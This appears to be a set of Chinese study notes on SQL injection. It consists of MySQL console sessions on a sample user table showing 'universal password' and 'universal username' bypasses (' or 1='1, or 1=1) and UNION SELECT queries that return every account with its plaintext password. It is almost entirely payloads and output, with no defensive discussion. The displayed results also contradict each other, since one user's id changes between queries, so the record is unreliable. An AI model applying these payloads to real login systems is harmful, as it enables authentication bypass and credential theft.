php.ini配置
magic_quotes_gpc = On
万能密码:
mysql> select * from user where username='wang' and password='123';
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
+--------+----------+----------+
1 row in set (0.00 sec)
mysql> select * from user where username='wang' and password='12';
Empty set (0.00 sec)
mysql> select * from user where username='wang' and password='aa' or 1='1';
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
| 2 | ke | 321 |
+--------+----------+----------+
3 rows in set (0.01 sec)
mysql> select * from user where username='wa' and password='aa' or 1='1';
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
| 2 | ke | 321 |
+--------+----------+----------+
3 rows in set (0.00 sec)
万能用户名:
mysql> select * from user where username='sjdlf' or 1=1 ;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
| 2 | ke | 321 |
+--------+----------+----------+
3 rows in set (0.00 sec)
mysql> select * from user where username='sjdlf' or 1=1 and password='123';
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
+--------+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from user where username='wang' union select * from user where userid=2;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
+--------+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from user where username='wang' union all select * from user where userid=2;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
+--------+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from user where username='wang' and password='123' union all select * from user where userid=2;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
+--------+----------+----------+
2 rows in set (0.00 sec)
mysql> select * from user where username='wang' and password='123' union all select * from user;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 1 | wang | 123 |
| 2 | yong | 123 |
| 3 | ke | 321 |
+--------+----------+----------+
4 rows in set (0.00 sec)
mysql> select * from user where username='wang' and password='123' union select * from user;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
| 3 | ke | 321 |
+--------+----------+----------+
3 rows in set (0.00 sec)
mysql> select * from user where username='wang' and password='321' union select * from user;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
| 3 | ke | 321 |
+--------+----------+----------+
3 rows in set (0.00 sec)
mysql> select * from user where username='wd' and password='321' union select * from user;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | wang | 123 |
| 2 | yong | 123 |
| 3 | ke | 321 |
+--------+----------+----------+
3 rows in set (0.00 sec)
mysql>